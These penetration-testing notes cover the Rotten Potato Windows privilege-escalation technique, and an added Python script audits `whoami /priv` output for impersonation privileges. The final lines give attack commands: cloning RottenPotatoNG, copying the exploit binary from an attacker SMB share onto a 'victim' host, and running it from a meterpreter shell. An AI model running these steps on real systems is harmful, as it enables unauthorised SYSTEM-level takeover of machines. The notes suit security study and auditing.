Windows privilege escalation technique.
- Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM
- Potatoes – Windows Privilege Escalation
Use when winPEAS or “whoami /priv” shows that the account has “SeImpersonatePrivilege” or an equivalent. This usually includes many Windows service accounts, such as the IIS and SQL Server accounts.
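To audit which accounts meet this precondition, the following added example (not part of the original notes or of any tool named here) parses saved `whoami /priv` output and reports the token privileges in question. The sample output is constructed, and reading "equivalent" as SeAssignPrimaryTokenPrivilege is this example's assumption.

```python
import re

# Token privileges that allow impersonating another account's token.
# Treating SeAssignPrimaryTokenPrivilege as the "equivalent" is this
# example's assumption; the page itself names only SeImpersonatePrivilege.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Constructed sample of `whoami /priv` output for a service account.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

def parse_whoami_priv(text):
    """Return {privilege_name: state} from `whoami /priv` table output."""
    lines = text.splitlines()
    # The ruler line made of '=' runs marks where the table rows begin.
    for i, line in enumerate(lines):
        if re.fullmatch(r"=+(\s+=+)+\s*", line):
            break
    else:
        raise ValueError("no whoami /priv table found")
    privs = {}
    for row in lines[i + 1:]:
        fields = row.split()
        if not fields:
            break  # a blank line ends the table
        # Privilege names contain no spaces; the state is the last word.
        privs[fields[0]] = fields[-1]
    return privs

def risky_privileges(text):
    """List (name, state) for token privileges held by the account.

    Disabled entries are reported too: a privilege listed as Disabled is
    still present in the token and can be enabled by the process itself.
    """
    privs = parse_whoami_priv(text)
    return sorted((n, s) for n, s in privs.items() if n in TOKEN_PRIVS)

if __name__ == "__main__":
    for name, state in risky_privileges(SAMPLE):
        print(f"[!] {name} present ({state}): confirm the account needs it")
```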
Download RottenPotatoNG
The code for RottenPotato is no longer maintained. Use the newer implementation, RottenPotatoNG (GitHub), instead.
git clone https://github.com/breenmachine/RottenPotatoNG.git
Upload file to the victim
Use Impacket smbserver.
copy \\x.x.x.x\myshare\RottenPotatoNG\RottenPotatoEXE\x64\Release\MSFRottenPotato.exe C:\<some path on victim>\MSFRottenPotato.exe
Execute the exploit
After obtaining a meterpreter shell with incognito mode loaded:
MSFRottenPotato.exe t c:\windows\temp\test.bat